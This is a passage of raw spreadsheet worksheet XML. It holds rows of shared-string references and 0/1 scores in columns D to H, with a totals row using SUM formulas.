      </c>
      <c r="B54" s="3" t="s">
        <v>1501</v>
      </c>
      <c r="C54" s="3" t="s">
        <v>1515</v>
      </c>
      <c r="D54" s="20">
        <v>1</v>
      </c>
      <c r="E54" s="20">
        <v>1</v>
      </c>
      <c r="F54" s="3" t="s">
        <v>1515</v>
      </c>
      <c r="G54">
        <v>1</v>
      </c>
      <c r="H54">
        <v>1</v>
      </c>
    </row>
    <row r="55" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A55" s="3" t="s">
        <v>1502</v>
      </c>
      <c r="B55" s="3" t="s">
        <v>1503</v>
      </c>
      <c r="C55" s="3" t="s">
        <v>1516</v>
      </c>
      <c r="D55" s="20">
        <v>1</v>
      </c>
      <c r="E55" s="20">
        <v>1</v>
      </c>
      <c r="F55" s="3" t="s">
        <v>1516</v>
      </c>
      <c r="G55">
        <v>1</v>
      </c>
      <c r="H55">
        <v>1</v>
      </c>
    </row>
    <row r="56" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A56" s="3" t="s">
        <v>1106</v>
      </c>
      <c r="B56" s="3" t="s">
        <v>1118</v>
      </c>
      <c r="C56" s="3" t="s">
        <v>1118</v>
      </c>
      <c r="D56" s="20">
        <v>1</v>
      </c>
      <c r="E56" s="20">
        <v>1</v>
      </c>
      <c r="F56" s="3" t="s">
        <v>1118</v>
      </c>
      <c r="G56">
        <v>1</v>
      </c>
      <c r="H56">
        <v>1</v>
      </c>
    </row>
    <row r="57" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A57" s="3" t="s">
        <v>1504</v>
      </c>
      <c r="B57" s="3" t="s">
        <v>1089</v>
      </c>
      <c r="C57" s="3" t="s">
        <v>1089</v>
      </c>
      <c r="D57" s="20">
        <v>1</v>
      </c>
      <c r="E57" s="20">
        <v>1</v>
      </c>
      <c r="F57" s="3" t="s">
        <v>1089</v>
      </c>
      <c r="G57">
        <v>1</v>
      </c>
      <c r="H57">
        <v>1</v>
      </c>
    </row>
    <row r="58" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A58" s="3"/>
      <c r="B58" s="3" t="s">
        <v>1539</v>
      </c>
      <c r="C58" s="3" t="s">
        <v>1542</v>
      </c>
      <c r="D58" s="20">
        <v>1</v>
      </c>
      <c r="E58" s="20">
        <v>1</v>
      </c>
      <c r="F58" s="3" t="s">
        <v>1542</v>
      </c>
      <c r="G58" s="19">
        <v>1</v>
      </c>
      <c r="H58" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="59" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A59" s="3"/>
      <c r="B59" s="3" t="s">
        <v>1540</v>
      </c>
      <c r="C59" s="3" t="s">
        <v>1540</v>
      </c>
      <c r="D59" s="20">
        <v>1</v>
      </c>
      <c r="E59" s="20">
        <v>1</v>
      </c>
      <c r="F59" s="3" t="s">
        <v>1540</v>
      </c>
      <c r="G59" s="19">
        <v>1</v>
      </c>
      <c r="H59" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="60" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A60" s="3" t="s">
        <v>1505</v>
      </c>
      <c r="B60" s="3" t="s">
        <v>1541</v>
      </c>
      <c r="C60" s="20"/>
      <c r="D60" s="20">
        <v>0</v>
      </c>
      <c r="E60" s="20">
        <v>0</v>
      </c>
      <c r="G60">
        <v>0</v>
      </c>
      <c r="H60">
        <v>0</v>
      </c>
    </row>
    <row r="61" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A61" s="3"/>
      <c r="B61" s="3" t="s">
        <v>1126</v>
      </c>
      <c r="C61" s="3" t="s">
        <v>1140</v>
      </c>
      <c r="D61" s="20">
        <v>1</v>
      </c>
      <c r="E61" s="20">
        <v>1</v>
      </c>
      <c r="F61" s="3" t="s">
        <v>1140</v>
      </c>
      <c r="G61" s="19">
        <v>1</v>
      </c>
      <c r="H61" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="62" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A62" s="3" t="s">
        <v>1506</v>
      </c>
      <c r="B62" s="3" t="s">
        <v>1125</v>
      </c>
      <c r="C62" s="3" t="s">
        <v>1141</v>
      </c>
      <c r="D62" s="20">
        <v>1</v>
      </c>
      <c r="E62" s="20">
        <v>1</v>
      </c>
      <c r="F62" s="3" t="s">
        <v>1141</v>
      </c>
      <c r="G62">
        <v>1</v>
      </c>
      <c r="H62">
        <v>1</v>
      </c>
    </row>
    <row r="63" spans="1:8" ht="138" x14ac:dyDescent="0.25">
      <c r="A63" s="3" t="s">
        <v>1507</v>
      </c>
      <c r="B63" s="3" t="s">
        <v>1508</v>
      </c>
      <c r="C63" s="3" t="s">
        <v>1517</v>
      </c>
      <c r="D63" s="20">
        <v>0</v>
      </c>
      <c r="E63" s="20">
        <v>0</v>
      </c>
      <c r="F63" s="3" t="s">
        <v>1517</v>
      </c>
      <c r="G63">
        <v>0</v>
      </c>
      <c r="H63">
        <v>0</v>
      </c>
    </row>
    <row r="64" spans="1:8" s="6" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A64" s="18" t="s">
        <v>41</v>
      </c>
      <c r="D64" s="6">
        <f>SUM(D18:D63)</f>
        <v>42</v>
      </c>
      <c r="E64" s="6">
        <f t="shared" ref="E64:H64" si="1">SUM(E18:E63)</f>
        <v>35</v>
      </c>
      <c r="F64" s="6">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="G64" s="6">
        <f t="shared" si="1"/>
        <v>42</v>
      </c>
      <c r="H64" s="6">
        <f t="shared" si="1"/>
        <v>35</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="3">
    <mergeCell ref="A1:H1"/>
    <mergeCell ref="A2:H2"/>
    <mergeCell ref="A16:H16"/>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51F68-B61A-4685-A13C-FEC9469FEB16}">
  <dimension ref="A1:H113"/>
  <sheetViews>
    <sheetView topLeftCell="A103" zoomScaleNormal="100" workbookViewId="0">
      <selection activeCell="J108" sqref="J108"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="13.8" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="26.77734375" customWidth="1"/>
    <col min="2" max="2" width="26.6640625" customWidth="1"/>
    <col min="3" max="3" width="26.77734375" customWidth="1"/>
    <col min="4" max="4" width="10.21875" customWidth="1"/>
    <col min="5" max="5" width="10.33203125" customWidth="1"/>
    <col min="6" max="6" width="26.88671875" customWidth="1"/>
    <col min="7" max="7" width="10" customWidth="1"/>
    <col min="8" max="8" width="11.109375" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="25.2" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A1" s="29" t="s">
        <v>384</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x14ac:dyDescent="0.25">
      <c r="A4" s="3" t="s">
        <v>385</v>
      </c>
      <c r="B4" s="3" t="s">
        <v>103</v>
      </c>
      <c r="C4" s="3" t="s">
        <v>103</v>
      </c>
      <c r="D4">
        <v>1</v>
      </c>
      <c r="E4">
        <v>1</v>
      </c>
      <c r="F4" s="3" t="s">
        <v>103</v>
      </c>
      <c r="G4">
        <v>1</v>
      </c>
      <c r="H4">
        <v>1</v>
      </c>
    </row>
    <row r="5" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5" s="3" t="s">
        <v>386</v>
      </c>
      <c r="B5" s="3" t="s">
        <v>387</v>
      </c>
      <c r="C5" s="3" t="s">
        <v>387</v>
      </c>
      <c r="D5">
        <v>1</v>
      </c>
      <c r="E5">
        <v>1</v>
      </c>
      <c r="F5" s="3" t="s">
        <v>387</v>
      </c>
      <c r="G5">
        <v>1</v>
      </c>
      <c r="H5">
        <v>1</v>
      </c>
    </row>
    <row r="6" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6" s="3" t="s">
        <v>388</v>
      </c>
      <c r="B6" s="3" t="s">
        <v>187</v>
      </c>
      <c r="C6" s="3" t="s">
        <v>187</v>
      </c>
      <c r="D6">
        <v>1</v>
      </c>
      <c r="E6">
        <v>1</v>
      </c>
      <c r="F6" s="3" t="s">
        <v>187</v>
      </c>
      <c r="G6">
        <v>1</v>
      </c>
      <c r="H6">
        <v>1</v>
      </c>
    </row>
    <row r="7" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7" s="3" t="s">
        <v>389</v>
      </c>
      <c r="B7" s="3"/>
      <c r="C7" s="3"/>
      <c r="F7" s="3"/>
    </row>
    <row r="8" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A8" s="3" t="s">
        <v>390</v>
      </c>
      <c r="B8" s="3" t="s">
        <v>391</v>
      </c>
      <c r="C8" s="3" t="s">
        <v>391</v>
      </c>
      <c r="D8">
        <v>1</v>
      </c>
      <c r="E8">
        <v>1</v>
      </c>
      <c r="F8" s="3" t="s">
        <v>391</v>
      </c>
      <c r="G8">
        <v>1</v>
      </c>
      <c r="H8">
        <v>0</v>
      </c>
    </row>
    <row r="9" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A9" s="3" t="s">
        <v>392</v>
      </c>
      <c r="B9" s="3" t="s">
        <v>393</v>
      </c>
      <c r="C9" s="3" t="s">
        <v>393</v>
      </c>
      <c r="D9">
        <v>1</v>
      </c>
      <c r="E9">
        <v>1</v>
      </c>
      <c r="F9" s="3" t="s">
        <v>393</v>
      </c>
      <c r="G9">
        <v>1</v>
      </c>
      <c r="H9">
        <v>0</v>
      </c>
    </row>
    <row r="10" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A10" s="3" t="s">
        <v>394</v>
      </c>
      <c r="B10" s="3" t="s">
        <v>395</v>
      </c>
      <c r="C10" s="3" t="s">
        <v>395</v>
      </c>
      <c r="D10">
        <v>1</v>
      </c>
      <c r="E10">
        <v>1</v>
      </c>
      <c r="F10" s="3" t="s">
        <v>530</v>
      </c>
      <c r="G10">
        <v>1</v>
      </c>
      <c r="H10">
        <v>0</v>
      </c>
    </row>
    <row r="11" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A11" s="3" t="s">
        <v>396</v>
      </c>
      <c r="B11" s="3" t="s">
        <v>397</v>
      </c>
      <c r="C11" s="3" t="s">
        <v>397</v>
      </c>
      <c r="D11">
        <v>1</v>
      </c>
      <c r="E11">
        <v>1</v>
      </c>
      <c r="F11" s="3" t="s">
        <v>397</v>
      </c>
      <c r="G11">
        <v>1</v>
      </c>
      <c r="H11">
        <v>0</v>
      </c>
    </row>
    <row r="12" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A12" s="3" t="s">
        <v>398</v>
      </c>
      <c r="B12" s="3" t="s">
        <v>399</v>
      </c>
      <c r="C12" s="3" t="s">
        <v>502</v>
      </c>
      <c r="D12">
        <v>1</v>
      </c>
      <c r="E12">
        <v>0</v>
      </c>
      <c r="F12" s="3" t="s">
        <v>399</v>
      </c>
      <c r="G12">
        <v>1</v>
      </c>
      <c r="H12">
        <v>0</v>
      </c>
    </row>
    <row r="13" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A13" s="3" t="s">
        <v>400</v>
      </c>
      <c r="B13" s="3" t="s">
        <v>401</v>
      </c>
      <c r="C13" s="3" t="s">
        <v>503</v>
      </c>
      <c r="D13">
        <v>1</v>
      </c>
      <c r="E13">
        <v>0</v>
      </c>
      <c r="F13" s="3" t="s">
        <v>531</v>
      </c>
      <c r="G13">
        <v>1</v>
      </c>
      <c r="H13">
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A14" s="3" t="s">
        <v>402</v>
      </c>
      <c r="B14" s="3" t="s">
        <v>403</v>
      </c>
      <c r="C14" s="3" t="s">
        <v>504</v>
      </c>
      <c r="D14">
        <v>1</v>
      </c>
      <c r="E14">
        <v>0</v>
      </c>
      <c r="F14" s="3" t="s">
        <v>403</v>
      </c>
      <c r="G14">
        <v>1</v>
      </c>
      <c r="H14">
        <v>1</v>
      </c>
    </row>
    <row r="15" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A15" s="3" t="s">
        <v>404</v>
      </c>
      <c r="B15" s="3" t="s">
        <v>405</v>
      </c>
      <c r="C15" s="3" t="s">
        <v>505</v>
      </c>
      <c r="D15">
        <v>1</v>
      </c>
      <c r="E15">
        <v>0</v>
      </c>
      <c r="F15" s="3" t="s">
        <v>532</v>
      </c>
      <c r="G15">
        <v>1</v>
      </c>
      <c r="H15">
        <v>0</v>
      </c>
    </row>
    <row r="16" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A16" s="3" t="s">
        <v>406</v>
      </c>
      <c r="B16" s="3" t="s">
        <v>407</v>
      </c>
      <c r="C16" s="3" t="s">
        <v>407</v>
      </c>
      <c r="D16">
        <v>1</v>
      </c>
      <c r="E16">
        <v>1</v>
      </c>
      <c r="F16" s="3" t="s">
        <v>407</v>
      </c>
      <c r="G16">
        <v>1</v>
      </c>
      <c r="H16">
        <v>1</v>
      </c>
    </row>
    <row r="17" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A17" s="3" t="s">
        <v>408</v>
      </c>
      <c r="B17" s="3" t="s">
        <v>409</v>
      </c>
      <c r="C17" s="3" t="s">
        <v>506</v>
      </c>
      <c r="D17">
        <v>1</v>
      </c>
      <c r="E17">
        <v>0</v>
      </c>
      <c r="F17" s="3" t="s">
        <v>533</v>
      </c>
      <c r="G17">
        <v>1</v>
      </c>
      <c r="H17">
        <v>1</v>
      </c>
    </row>
    <row r="18" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A18" s="3" t="s">
        <v>410</v>
      </c>
      <c r="B18" s="3" t="s">
        <v>411</v>
      </c>
      <c r="C18" s="3" t="s">
        <v>507</v>
      </c>
      <c r="D18">
        <v>1</v>
      </c>
      <c r="E18">
        <v>0</v>
      </c>
      <c r="F18" s="3" t="s">
        <v>534</v>
      </c>
      <c r="G18">
        <v>1</v>
      </c>
      <c r="H18">
        <v>0</v>
      </c>
    </row>
    <row r="19" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A19" s="3" t="s">
        <v>412</v>
      </c>
      <c r="B19" s="3" t="s">
        <v>413</v>
      </c>
      <c r="C19" s="3" t="s">
        <v>413</v>
      </c>
      <c r="D19">
        <v>1</v>
      </c>
      <c r="E19">
        <v>1</v>
      </c>
      <c r="F19" s="3" t="s">
        <v>413</v>
      </c>
      <c r="G19">
        <v>1</v>
      </c>
      <c r="H19">
        <v>1</v>
      </c>
    </row>
    <row r="20" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A20" s="3" t="s">
        <v>414</v>
      </c>
      <c r="B20" s="3" t="s">
        <v>414</v>
      </c>
      <c r="C20" s="3" t="s">
        <v>414</v>
      </c>
      <c r="D20">
        <v>1</v>
      </c>
      <c r="E20">
        <v>1</v>
      </c>
      <c r="F20" s="3" t="s">
        <v>414</v>
      </c>
      <c r="G20">
        <v>1</v>
      </c>
      <c r="H20">
        <v>1</v>
      </c>
    </row>
    <row r="21" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A21" s="3" t="s">
        <v>415</v>
      </c>
      <c r="B21" s="3" t="s">
        <v>416</v>
      </c>
      <c r="C21" s="3" t="s">
        <v>508</v>
      </c>
      <c r="D21">
        <v>1</v>
      </c>
      <c r="E21">
        <v>0</v>
      </c>
      <c r="F21" s="3" t="s">
        <v>508</v>
      </c>
      <c r="G21">
        <v>0</v>
      </c>
      <c r="H21">
        <v>0</v>
      </c>
    </row>
    <row r="22" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A22" s="3" t="s">
        <v>417</v>
      </c>
      <c r="B22" s="3" t="s">
        <v>411</v>
      </c>
      <c r="C22" s="3" t="s">
        <v>509</v>
      </c>
      <c r="D22">
        <v>1</v>
      </c>
      <c r="E22">
        <v>1</v>
      </c>
      <c r="F22" s="3" t="s">
        <v>534</v>
      </c>
      <c r="G22">
        <v>1</v>
      </c>
      <c r="H22">
        <v>1</v>
      </c>
    </row>
    <row r="23" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A23" s="3" t="s">
        <v>412</v>
      </c>
      <c r="B23" s="3" t="s">
        <v>413</v>
      </c>
      <c r="C23" s="3" t="s">
        <v>413</v>
      </c>
      <c r="D23">
        <v>1</v>
      </c>
      <c r="E23">
        <v>1</v>
      </c>
      <c r="F23" s="3" t="s">
        <v>413</v>
      </c>
      <c r="G23">
        <v>1</v>
      </c>
      <c r="H23">
        <v>1</v>
      </c>
    </row>
    <row r="24" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A24" s="3" t="s">
        <v>418</v>
      </c>
      <c r="B24" s="3" t="s">
        <v>414</v>
      </c>
      <c r="C24" s="3" t="s">
        <v>510</v>
      </c>
      <c r="D24">
        <v>1</v>
      </c>
      <c r="E24">
        <v>0</v>
      </c>
      <c r="F24" s="3" t="s">
        <v>414</v>
      </c>
      <c r="G24">
        <v>1</v>
      </c>
      <c r="H24">
        <v>0</v>
      </c>
    </row>
    <row r="25" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A25" s="3" t="s">
        <v>419</v>
      </c>
      <c r="B25" s="3" t="s">
        <v>420</v>
      </c>
      <c r="C25" s="3" t="s">
        <v>511</v>
      </c>
      <c r="D25">
        <v>1</v>
      </c>
      <c r="E25">
        <v>0</v>
      </c>
      <c r="F25" s="3" t="s">
        <v>535</v>
      </c>
      <c r="G25">
        <v>0</v>
      </c>
      <c r="H25">
        <v>0</v>
      </c>
    </row>
    <row r="26" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A26" s="3" t="s">
        <v>421</v>
      </c>
      <c r="B26" s="3" t="s">
        <v>422</v>
      </c>
      <c r="C26" s="3" t="s">
        <v>512</v>
      </c>
      <c r="D26">
        <v>0</v>
      </c>
      <c r="E26">
        <v>0</v>
      </c>
      <c r="F26" s="3" t="s">
        <v>422</v>
      </c>
      <c r="G26">
        <v>1</v>
      </c>
      <c r="H26">
        <v>1</v>
      </c>
    </row>
    <row r="27" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A27" s="3" t="s">
        <v>423</v>
      </c>
      <c r="B27" s="3" t="s">
        <v>424</v>
      </c>
      <c r="C27" s="3" t="s">
        <v>513</v>
      </c>
      <c r="D27">
        <v>1</v>
      </c>
      <c r="E27">
        <v>1</v>
      </c>
      <c r="F27" s="3" t="s">
        <v>424</v>
      </c>
      <c r="G27">
        <v>1</v>
      </c>
      <c r="H27">
        <v>1</v>
      </c>
    </row>
    <row r="28" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A28" s="3" t="s">
        <v>412</v>
      </c>
      <c r="B28" s="3" t="s">
        <v>413</v>
      </c>
      <c r="C28" s="3" t="s">
        <v>413</v>
      </c>
      <c r="D28">
        <v>1</v>
      </c>
      <c r="E28">
        <v>1</v>
      </c>
      <c r="F28" s="3" t="s">
        <v>413</v>
      </c>
      <c r="G28">
        <v>1</v>
      </c>
      <c r="H28">
        <v>1</v>
      </c>
    </row>
    <row r="29" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A29" s="3" t="s">
        <v>425</v>
      </c>
      <c r="B29" s="3" t="s">
        <v>414</v>
      </c>
      <c r="C29" s="3" t="s">
        <v>414</v>
      </c>
      <c r="D29">
        <v>1</v>
      </c>
      <c r="E29">
        <v>1</v>
      </c>
      <c r="F29" s="3" t="s">
        <v>414</v>
      </c>
      <c r="G29">
        <v>1</v>
      </c>
      <c r="H29">
        <v>1</v>
      </c>
    </row>
    <row r="30" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A30" s="3" t="s">
        <v>426</v>
      </c>
      <c r="B30" s="3" t="s">
        <v>427</v>
      </c>
      <c r="C30" s="3" t="s">
        <v>514</v>
      </c>
      <c r="D30">
        <v>1</v>
      </c>
      <c r="E30">
        <v>1</v>
      </c>
      <c r="F30" s="3" t="s">
        <v>427</v>
      </c>
      <c r="G30">
        <v>1</v>
      </c>
      <c r="H30">
        <v>1</v>
      </c>
    </row>
    <row r="31" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A31" s="3" t="s">
        <v>428</v>
      </c>
      <c r="B31" s="3" t="s">
        <v>414</v>
      </c>
      <c r="C31" s="3" t="s">
        <v>414</v>
      </c>
      <c r="D31">
        <v>1</v>
      </c>
      <c r="E31">
        <v>1</v>
      </c>
      <c r="F31" s="3" t="s">
        <v>414</v>
      </c>
      <c r="G31">
        <v>1</v>
      </c>
      <c r="H31">
        <v>1</v>
      </c>
    </row>
    <row r="32" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A32" s="3" t="s">
        <v>429</v>
      </c>
      <c r="B32" s="3" t="s">
        <v>430</v>
      </c>
      <c r="C32" s="3" t="s">
        <v>515</v>
      </c>
      <c r="D32">
        <v>1</v>
      </c>
      <c r="E32">
        <v>1</v>
      </c>
      <c r="F32" s="3" t="s">
        <v>430</v>
      </c>
      <c r="G32">
        <v>1</v>
      </c>
      <c r="H32">
        <v>1</v>
      </c>
    </row>
    <row r="33" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A33" s="3" t="s">
        <v>431</v>
      </c>
      <c r="B33" s="3" t="s">
        <v>431</v>
      </c>
      <c r="C33" s="3" t="s">
        <v>431</v>
      </c>
      <c r="D33">
        <v>1</v>
      </c>
      <c r="E33">
        <v>1</v>
      </c>
      <c r="F33" s="3" t="s">
        <v>431</v>
      </c>
      <c r="G33">
        <v>1</v>
      </c>
      <c r="H33">
        <v>1</v>
      </c>
    </row>
    <row r="34" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A34" s="3" t="s">
        <v>432</v>
      </c>
      <c r="B34" s="3" t="s">
        <v>433</v>
      </c>
      <c r="C34" s="3" t="s">
        <v>433</v>
      </c>
      <c r="D34">
        <v>1</v>
      </c>
      <c r="E34">
        <v>1</v>
      </c>
      <c r="F34" s="3" t="s">
        <v>433</v>
      </c>
      <c r="G34">
        <v>1</v>
      </c>
      <c r="H34">
        <v>1</v>
      </c>
    </row>
    <row r="35" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A35" s="3" t="s">
        <v>434</v>
      </c>
      <c r="B35" s="3"/>
      <c r="C35" s="3"/>
      <c r="F35" s="3"/>
    </row>
    <row r="36" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A36" s="3" t="s">
        <v>435</v>
      </c>
      <c r="B36" s="3" t="s">
        <v>436</v>
      </c>
      <c r="C36" s="3" t="s">
        <v>436</v>
      </c>
      <c r="D36">
        <v>1</v>
      </c>
      <c r="E36">
        <v>1</v>
      </c>
      <c r="F36" s="3" t="s">
        <v>436</v>
      </c>
      <c r="G36">
        <v>1</v>
      </c>
      <c r="H36">
        <v>1</v>
      </c>
    </row>
    <row r="37" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A37" s="3" t="s">
        <v>437</v>
      </c>
      <c r="B37" s="3" t="s">
        <v>438</v>
      </c>
      <c r="C37" s="3" t="s">
        <v>438</v>
      </c>
      <c r="D37">
        <v>1</v>
      </c>
      <c r="E37">
        <v>1</v>
      </c>
      <c r="F37" s="3" t="s">
        <v>536</v>
      </c>
      <c r="G37">
        <v>0</v>
      </c>
      <c r="H37">
        <v>0</v>
      </c>
    </row>
    <row r="38" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A38" s="3" t="s">
        <v>439</v>
      </c>
      <c r="B38" s="3" t="s">
        <v>440</v>
      </c>
      <c r="C38" s="3" t="s">
        <v>440</v>
      </c>
      <c r="D38">
        <v>1</v>
      </c>
      <c r="E38">
        <v>1</v>
      </c>
      <c r="F38" s="3" t="s">
        <v>440</v>
      </c>
      <c r="G38">
        <v>1</v>
      </c>
      <c r="H38">
        <v>1</v>
      </c>
    </row>
    <row r="39" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A39" s="3" t="s">
        <v>441</v>
      </c>
      <c r="B39" s="3" t="s">
        <v>442</v>
      </c>
      <c r="C39" s="3" t="s">
        <v>516</v>
      </c>
      <c r="D39">
        <v>0</v>
      </c>
      <c r="E39">
        <v>0</v>
      </c>
      <c r="F39" s="3" t="s">
        <v>537</v>
      </c>
      <c r="G39">
        <v>0</v>
      </c>
      <c r="H39">
        <v>0</v>
      </c>
    </row>
    <row r="40" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A40" s="3" t="s">
        <v>443</v>
      </c>
      <c r="B40" s="3" t="s">
        <v>444</v>
      </c>
      <c r="C40" s="3" t="s">
        <v>517</v>
      </c>
      <c r="D40">
        <v>0</v>
      </c>
      <c r="E40">
        <v>0</v>
      </c>
      <c r="F40" s="3" t="s">
        <v>538</v>
      </c>
      <c r="G40">
        <v>0</v>
      </c>
      <c r="H40">
        <v>0</v>
      </c>
    </row>
    <row r="41" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A41" s="3" t="s">
        <v>445</v>
      </c>
      <c r="B41" s="3" t="s">
        <v>446</v>
      </c>
      <c r="C41" s="3" t="s">
        <v>446</v>
      </c>
      <c r="D41">
        <v>1</v>
      </c>
      <c r="E41">
        <v>1</v>
      </c>
      <c r="F41" s="3" t="s">
        <v>446</v>
      </c>
      <c r="G41">
        <v>1</v>
      </c>
      <c r="H41">
        <v>1</v>
      </c>
    </row>
    <row r="42" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A42" s="3" t="s">
        <v>447</v>
      </c>
      <c r="B42" s="3" t="s">
        <v>448</v>
      </c>
      <c r="C42" s="3" t="s">
        <v>448</v>
      </c>
      <c r="D42">
        <v>1</v>
      </c>
      <c r="E42">
        <v>1</v>
      </c>
      <c r="F42" s="3" t="s">
        <v>448</v>
      </c>
      <c r="G42">
        <v>1</v>
      </c>
      <c r="H42">
        <v>1</v>
      </c>
    </row>
    <row r="43" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A43" s="3" t="s">
        <v>449</v>
      </c>
      <c r="B43" s="3" t="s">
        <v>450</v>
      </c>
      <c r="C43" s="3" t="s">
        <v>450</v>
      </c>
      <c r="D43">
        <v>1</v>
      </c>
      <c r="E43">
        <v>1</v>
      </c>
      <c r="F43" s="3" t="s">
        <v>450</v>
      </c>
      <c r="G43">
        <v>1</v>
      </c>
      <c r="H43">
        <v>1</v>
      </c>
    </row>
    <row r="44" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A44" s="3" t="s">
        <v>451</v>
      </c>
      <c r="B44" s="3" t="s">
        <v>452</v>
      </c>
      <c r="C44" s="3" t="s">
        <v>452</v>
      </c>
      <c r="D44">
        <v>1</v>
      </c>
      <c r="E44">
        <v>1</v>
      </c>
      <c r="F44" s="3" t="s">
        <v>452</v>
      </c>
      <c r="G44">
        <v>1</v>
      </c>
      <c r="H44">
        <v>1</v>
      </c>
    </row>
    <row r="45" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A45" s="3" t="s">
        <v>453</v>
      </c>
      <c r="B45" s="3" t="s">
        <v>454</v>
      </c>
      <c r="C45" s="3" t="s">
        <v>454</v>
      </c>
      <c r="D45">
        <v>1</v>
      </c>
      <c r="E45">
        <v>1</v>
      </c>
      <c r="F45" s="3" t="s">
        <v>454</v>
      </c>
      <c r="G45">
        <v>1</v>
      </c>
      <c r="H45">
        <v>1</v>
      </c>
    </row>
    <row r="46" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A46" s="3" t="s">
        <v>455</v>
      </c>
      <c r="B46" s="3" t="s">
        <v>456</v>
      </c>
      <c r="C46" s="3" t="s">
        <v>456</v>
      </c>
      <c r="D46">
        <v>1</v>
      </c>
      <c r="E46">
        <v>1</v>
      </c>
      <c r="F46" s="3" t="s">
        <v>456</v>
      </c>
      <c r="G46">
        <v>1</v>
      </c>
      <c r="H46">
        <v>1</v>
      </c>
    </row>
    <row r="47" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A47" s="3" t="s">
        <v>457</v>
      </c>
      <c r="B47" s="3" t="s">
        <v>458</v>
      </c>
      <c r="C47" s="3" t="s">
        <v>458</v>
      </c>
      <c r="D47">
        <v>1</v>
      </c>
      <c r="E47">
        <v>1</v>
      </c>
      <c r="F47" s="3" t="s">
        <v>458</v>
      </c>
      <c r="G47">
        <v>1</v>
      </c>
      <c r="H47">
        <v>1</v>
      </c>
    </row>
    <row r="48" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A48" s="3" t="s">
        <v>414</v>
      </c>
      <c r="B48" s="3" t="s">
        <v>414</v>
      </c>
      <c r="C48" s="3" t="s">
        <v>414</v>
      </c>
      <c r="D48">
        <v>1</v>
      </c>
      <c r="E48">
        <v>1</v>
      </c>
      <c r="F48" s="3" t="s">
        <v>414</v>
      </c>
      <c r="G48">
        <v>1</v>
      </c>
      <c r="H48">
        <v>1</v>
      </c>
    </row>
    <row r="49" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A49" s="3" t="s">
        <v>459</v>
      </c>
      <c r="B49" s="3" t="s">
        <v>460</v>
      </c>
      <c r="C49" s="3" t="s">
        <v>518</v>
      </c>
      <c r="D49">
        <v>1</v>
      </c>
      <c r="E49">
        <v>1</v>
      </c>
      <c r="F49" s="3" t="s">
        <v>460</v>
      </c>
      <c r="G49">
        <v>1</v>
      </c>
      <c r="H49">
        <v>1</v>
      </c>
    </row>
    <row r="50" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A50" s="3" t="s">
        <v>414</v>
      </c>
      <c r="B50" s="3" t="s">
        <v>414</v>
      </c>
      <c r="C50" s="3" t="s">
        <v>414</v>
      </c>
      <c r="D50">
        <v>1</v>
